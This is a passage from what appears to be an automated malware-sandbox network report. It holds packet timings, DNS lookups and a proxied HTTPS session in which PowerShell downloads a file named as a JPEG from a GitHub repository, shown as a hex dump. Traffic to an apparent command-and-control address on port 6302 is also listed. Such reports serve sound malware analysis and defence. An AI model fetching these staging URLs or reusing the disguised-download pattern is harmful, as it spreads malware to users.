                                                                    Sep 26, 2024 12:16:30.525511980 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.525516033 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.525540113 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.526336908 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.526413918 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.526415110 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.526449919 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.526485920 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.526514053 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.527245998 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.527266979 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.527321100 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.527322054 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.527338982 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.527368069 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.530626059 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.530649900 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.530685902 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.530690908 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.530718088 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.531444073 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.531495094 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.531505108 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.531517982 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.531547070 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.531574965 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.532212019 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.532231092 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.532267094 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.532269001 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.532278061 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.532296896 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.532305002 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.584351063 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.611468077 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.611498117 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.611556053 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.611597061 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.611617088 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.611639977 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.611721992 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.611746073 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.611777067 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.611782074 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.611813068 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.612015009 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.612051010 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.612078905 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.612085104 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.612113953 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.612148046 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.612359047 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.612380028 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.612430096 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.612436056 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.612446070 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.612473011 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.612488031 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.612849951 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.612869024 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.612910986 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.612916946 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.612946987 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.613210917 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.613244057 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.613275051 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.613277912 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.613287926 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.613306046 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.613327980 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.613675117 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.613696098 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.613734961 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.613739014 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.613761902 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.613771915 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.613775015 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.662460089 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.697987080 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.698012114 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.698052883 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.698123932 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.698137999 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.698184013 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.698371887 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.698417902 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.698465109 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.698503971 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.698508024 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.698549986 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.698736906 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.698755026 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.698813915 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.698820114 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.698824883 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.698863029 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.698947906 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.699007034 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.699012995 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.699033976 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.699047089 CEST4434973852.216.210.153192.168.2.4
                                                                    Sep 26, 2024 12:16:30.699073076 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.699101925 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:30.699433088 CEST49738443192.168.2.452.216.210.153
                                                                    Sep 26, 2024 12:16:33.208069086 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:33.213098049 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:33.213177919 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:33.221570969 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:33.226408005 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:33.883621931 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:33.921233892 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:33.926067114 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:34.112550974 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:34.162520885 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:39.174086094 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:39.180063963 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:39.737417936 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:39.737438917 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:39.737452030 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:39.737463951 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:39.737476110 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:39.737487078 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:39.737523079 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:39.896811008 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:41.150221109 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:41.155210972 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.155251026 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.155278921 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:41.155284882 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.155313015 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.155313969 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:41.155335903 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:41.155343056 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.155360937 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:41.155375957 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.155388117 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:41.155416012 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:41.155424118 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.155452013 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.155467987 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:41.155478954 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.155497074 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:41.155510902 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.155520916 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:41.155549049 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:41.160290003 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.160392046 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.160418987 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.160449028 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.165076017 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.165103912 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.165131092 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.165157080 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.165183067 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.165209055 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.165235043 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.165260077 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.165286064 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.484795094 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.485594988 CEST497396302192.168.2.4185.196.9.26
                                                                    Sep 26, 2024 12:16:41.490529060 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.711421967 CEST630249739185.196.9.26192.168.2.4
                                                                    Sep 26, 2024 12:16:41.769349098 CEST497396302192.168.2.4185.196.9.26

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Sep 26, 2024 12:16:22.306884050 CEST5495853192.168.2.41.1.1.1
                                                                    Sep 26, 2024 12:16:22.314162970 CEST53549581.1.1.1192.168.2.4
                                                                    Sep 26, 2024 12:16:28.202207088 CEST5341853192.168.2.41.1.1.1
                                                                    Sep 26, 2024 12:16:28.209585905 CEST53534181.1.1.1192.168.2.4
                                                                    Sep 26, 2024 12:16:29.531461000 CEST6048253192.168.2.41.1.1.1
                                                                    Sep 26, 2024 12:16:29.553848982 CEST53604821.1.1.1192.168.2.4

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Sep 26, 2024 12:16:22.306884050 CEST192.168.2.41.1.1.10x7378Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:28.202207088 CEST192.168.2.41.1.1.10xbaebStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:29.531461000 CEST192.168.2.41.1.1.10x99e1Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Sep 26, 2024 12:16:22.314162970 CEST1.1.1.1192.168.2.40x7378No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:22.314162970 CEST1.1.1.1192.168.2.40x7378No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:22.314162970 CEST1.1.1.1192.168.2.40x7378No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:22.314162970 CEST1.1.1.1192.168.2.40x7378No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:28.209585905 CEST1.1.1.1192.168.2.40xbaebNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:28.209585905 CEST1.1.1.1192.168.2.40xbaebNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:28.209585905 CEST1.1.1.1192.168.2.40xbaebNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:29.553848982 CEST1.1.1.1192.168.2.40x99e1No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:29.553848982 CEST1.1.1.1192.168.2.40x99e1No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:29.553848982 CEST1.1.1.1192.168.2.40x99e1No error (0)s3-w.us-east-1.amazonaws.com52.216.210.153A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:29.553848982 CEST1.1.1.1192.168.2.40x99e1No error (0)s3-w.us-east-1.amazonaws.com3.5.28.137A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:29.553848982 CEST1.1.1.1192.168.2.40x99e1No error (0)s3-w.us-east-1.amazonaws.com54.231.164.241A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:29.553848982 CEST1.1.1.1192.168.2.40x99e1No error (0)s3-w.us-east-1.amazonaws.com52.216.209.225A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:29.553848982 CEST1.1.1.1192.168.2.40x99e1No error (0)s3-w.us-east-1.amazonaws.com3.5.7.110A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:29.553848982 CEST1.1.1.1192.168.2.40x99e1No error (0)s3-w.us-east-1.amazonaws.com52.216.210.57A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:29.553848982 CEST1.1.1.1192.168.2.40x99e1No error (0)s3-w.us-east-1.amazonaws.com52.216.154.212A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 12:16:29.553848982 CEST1.1.1.1192.168.2.40x99e1No error (0)s3-w.us-east-1.amazonaws.com3.5.28.99A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • raw.githubusercontent.com
                                                                    • bitbucket.org
                                                                    • bbuseruploads.s3.amazonaws.com

                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.449730185.199.109.1334437664C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-26 10:16:23 UTC117OUTGET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1
                                                                    Host: raw.githubusercontent.com
                                                                    Connection: Keep-Alive
                                                                    2024-09-26 10:16:23 UTC888INHTTP/1.1 200 OK
                                                                    Connection: close
                                                                    Content-Length: 2578503
                                                                    Cache-Control: max-age=300
                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                    Content-Type: image/jpeg
                                                                    ETag: "ba4b733aa1ad403bc9cacb2a172994a886bea7b08e7a7dfb33ae1618861cbf3e"
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    X-Content-Type-Options: nosniff
                                                                    X-Frame-Options: deny
                                                                    X-XSS-Protection: 1; mode=block
                                                                    X-GitHub-Request-Id: 50C2:20FE55:4D64F4:53D4ED:66F53476
                                                                    Accept-Ranges: bytes
                                                                    Date: Thu, 26 Sep 2024 10:16:23 GMT
                                                                    Via: 1.1 varnish
                                                                    X-Served-By: cache-nyc-kteb1890039-NYC
                                                                    X-Cache: MISS
                                                                    X-Cache-Hits: 0
                                                                    X-Timer: S1727345783.091165,VS0,VE53
                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                    Access-Control-Allow-Origin: *
                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                    X-Fastly-Request-ID: 3b71ff962979e50593e69e4dbc64c549cda02ad7
                                                                    Expires: Thu, 26 Sep 2024 10:21:23 GMT
                                                                    Source-Age: 0
                                                                    2024-09-26 10:16:23 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 00 16 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 00 00 00 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 00 09 0a ff c4 00 5f 10 00 01 03 03 03 02 04 03 06 04 03 06 03 01 01 21 01
                                                                    Data Ascii: JFIF,,ExifMM*CCp"_!
                                                                    2024-09-26 10:16:23 UTC1378INData Raw: 24 18 1e 91 51 6f 5a c4 83 c0 9a 67 14 d0 b7 13 58 bc c9 51 49 0b 24 fe 82 ac 98 bc c8 5a 09 07 9e dc d5 02 dd e2 d3 9d e0 fd 4d 4e e3 ef c0 48 f3 07 cc 71 55 ad a7 82 c4 2d 34 4c 65 ef 88 13 f3 00 a1 c8 9a 9b c6 e4 4a 09 2a 50 93 c5 67 b8 dc d4 04 93 bb 81 e6 6a 7a cb 32 1c 03 9e 3b 1a ca bb 4b f2 5c ae ec 17 66 6f d2 e2 c9 07 81 db 9a 77 6d 91 9e 27 81 ef 55 16 72 68 20 6d 51 e0 53 db 5c 9e c5 70 7b f7 ac eb 34 a5 c8 5c 99 72 b6 c9 a5 6a 09 dd 13 db 9a 92 b1 c8 04 b8 08 51 1e 51 35 4d b4 c9 25 6a 32 44 cf 11 52 56 b9 12 81 24 f3 ea 6b 3e dd 31 34 6d 45 da cf 20 82 a0 24 26 7d 2a 4e de e4 00 40 33 f9 d5 22 cb 2a 54 52 b2 b1 c1 a9 cc 7e 60 38 90 24 92 0f 27 da b3 ed d3 63 82 c2 b0 b2 b6 f9 09 10 7b 89 26 69 eb 37 90 00 2a 9e 3e 95 5f 62 ed 25 00 85 73 e5
                                                                    Data Ascii: $QoZgXQI$ZMNHqU-4LeJ*Pgjz2;K\fowm'Urh mQS\p{4\rjQQ5M%j2DRV$k>14mE $&}*N@3"*TR~`8$'c{&i7*>_b%s
                                                                    2024-09-26 10:16:23 UTC1378INData Raw: d3 36 fb 95 ce d3 e7 dc d1 db 67 fa 7c 8f 9d 42 e5 82 45 1c 8d 9a b4 51 50 e6 38 a5 3e e4 4a 7c b9 ef ef 4f 19 68 25 24 9f 2e dc d1 cb 32 92 02 b7 03 dc 11 11 4d 91 da c7 04 63 d6 9c 92 08 ef 13 4c ee 99 da 24 80 ae fd 8d 4a dc 32 12 83 c7 3d a3 bd 47 df c0 90 0c 77 f6 a9 ea 7d 88 e5 f8 2b 59 44 43 ca 06 15 35 0e f3 24 dc 42 40 ef 56 1c 9b 33 bb 90 66 a2 14 d0 4a b9 24 41 e6 2b 42 a9 60 83 01 98 64 18 22 02 92 3f 4a 92 b2 b5 da 67 ba 7b c7 95 34 b7 46 e5 90 07 35 25 6a df 1e fe d4 ac 7c 88 70 cb 13 12 39 fa d4 a5 83 40 24 13 c1 9a 67 6e 81 c9 90 94 f1 52 56 ed a4 01 04 89 20 fe 95 42 d6 4d 0e e4 a6 3f 97 01 3c c1 e0 d4 e6 39 3f cc 9d c4 8f 7a 81 b3 3b 52 23 cf f2 a9 9c 59 da b1 ef 59 97 47 25 98 48 b0 32 90 1a 04 7f ed a3 bc 99 41 88 07 d6 9b 5b bf bd 20
                                                                    Data Ascii: 6g|BEQP8>J|Oh%$.2McL$J2=Gw}+YDC5$B@V3fJ$A+B`d"?Jg{4F5%j|p9@$gnRV BM?<9?z;R#YYG%H2A[
                                                                    2024-09-26 10:16:23 UTC1378INData Raw: 8e 4a 64 d7 92 d8 9e f0 45 33 42 12 f0 c9 23 88 9f 78 a3 a2 dc 92 78 fd e9 54 b4 24 19 3f 4a 55 b6 b6 aa 3f 3a 61 2e e3 74 5b 13 27 b7 95 1c 5b d3 94 b1 c7 3c c7 bd 1d 0c 00 a1 00 8a 61 f0 34 16 b0 8f 51 33 47 4b 45 24 1e 38 e3 eb 4e 9b b6 fa 8f de 8c 2d 79 fe 93 f5 a6 ca 1d 44 41 0c 00 92 3c cc d3 86 d9 26 38 ef 47 43 1e 7e 54 b2 59 00 8e 60 9a 8e 4c 20 5b 66 12 27 bd 2c da 4e d1 20 40 f7 af 36 80 90 47 04 fb 9e d4 a3 68 fe 58 93 1e f5 14 98 85 19 1c cf 03 e9 4a 34 9e 3d 7d 3e 94 54 20 05 7e 5e bc 52 ed 08 1c 77 a8 98 85 52 9f 98 79 4d 2e d9 db 3e 54 92 47 cf f9 52 81 3f 28 f5 91 4c 21 64 02 76 82 4f d6 3b 52 cd 88 4c 70 07 bd 26 d2 78 1f 48 a5 d9 4c 9f 38 ef 4b 3e 07 4c 59 a4 46 de 07 f9 52 88 68 11 07 88 33 e9 45 68 02 07 a8 a5 db 4c 02 01 35 13 ee 12
                                                                    Data Ascii: JdE3B#xxT$?JU?:a.t['[<a4Q3GKE$8N-yDA<&8GC~TY`L [f',N @6GhXJ4=}>T ~^RwRyM.>TGR?(L!dvO;RLp&xHL8K>LYFRh3EhL5
                                                                    2024-09-26 10:16:23 UTC1378INData Raw: 95 3f 71 a0 a0 48 ef f5 a6 eb 42 52 0f 3c 1e e6 6a 64 c6 19 b8 90 90 67 f4 f2 a4 96 ce d8 e0 71 c5 3b 5b 61 20 9f 23 c0 a4 d6 d0 28 10 7c fb cd 16 46 68 68 b6 41 41 f9 79 f4 9e d4 9a 98 f2 20 03 dc 0a 78 a6 46 d2 00 04 0f 32 4d 26 e3 5b bb 00 67 f6 a2 c8 29 7c 8d 14 d9 90 08 04 1e 68 a5 8e f1 00 27 9a 74 2d c8 32 41 8f 28 f2 af 1b 71 23 eb cd 3e e1 34 35 f0 26 47 12 3d 3c e8 a1 93 b4 f0 29 e1 b7 f9 b8 3d bb f1 44 5b 69 4a 79 54 d2 c8 d8 1a 86 bf 98 78 1c 9a 21 47 ca 0c f7 34 ec b7 24 41 fa 99 e0 d1 54 da 60 fa 0a 25 2f 91 f0 86 c1 82 7b 89 99 ee 68 85 8d d3 f5 a7 7f 77 24 9e 3c a2 7d 6b ce 31 02 79 81 4e 98 b0 30 fb b6 d5 a7 ce 8a ab 7d 80 9f 39 fd 29 f1 64 2d 5c 72 12 68 0b 30 4c f6 34 fb 86 23 9e 60 01 c8 1c 7b 52 4b 60 02 60 77 fa f1 52 6e 5b ed 20 77
                                                                    Data Ascii: ?qHBR<jdgq;[a #(|FhhAAy xF2M&[g)|h't-2A(q#>45&G=<)=D[iJyTx!G4$AT`%/{hw$<}k1yN0}9)d-\rh0L4#`{RK``wRn[ w
                                                                    2024-09-26 10:16:23 UTC1378INData Raw: 3e b6 70 73 07 cb 9a 8e 6d 44 79 4d 38 b7 70 c4 81 07 fb d4 6d 06 4b 5a be 5b 3c 49 9e 40 9a 9e c5 27 e5 49 51 12 07 61 55 76 6e 36 41 1e 5e 95 31 8f bf de 90 07 11 e8 6a bd 8b e0 24 c9 f1 0a 71 04 76 3d c5 3e b6 64 a8 48 24 01 e9 51 b8 fb b4 ba be 47 20 7a d4 8b 4f 04 98 98 3f 5a 81 a6 10 f4 38 10 60 99 a2 15 00 66 7b f3 49 3a ec f1 27 f2 ed 44 2e 84 cc 77 a8 c9 32 1d d5 02 a9 f2 3c 53 75 10 41 f2 22 85 6e 40 04 77 f7 a4 d6 e6 e1 db bf 07 da 90 84 d6 42 79 3e 73 34 92 d4 53 13 dc 8e d4 67 7f 01 e4 71 48 ba a9 51 24 89 ed 1e b4 84 11 c5 cc 9a 49 c5 03 04 9e dc 51 d6 24 11 c5 22 e7 2a 1c 0f d6 90 32 00 ae 24 99 91 e5 49 a9 41 07 82 4c 9f 5a f1 30 99 9e 4d 26 a5 98 82 3b d1 a5 80 41 71 72 a3 c9 fd 68 8b 7a 04 49 8a 05 9d d3 fa f1 49 19 0a 04 76 f5 f4 a2 4b
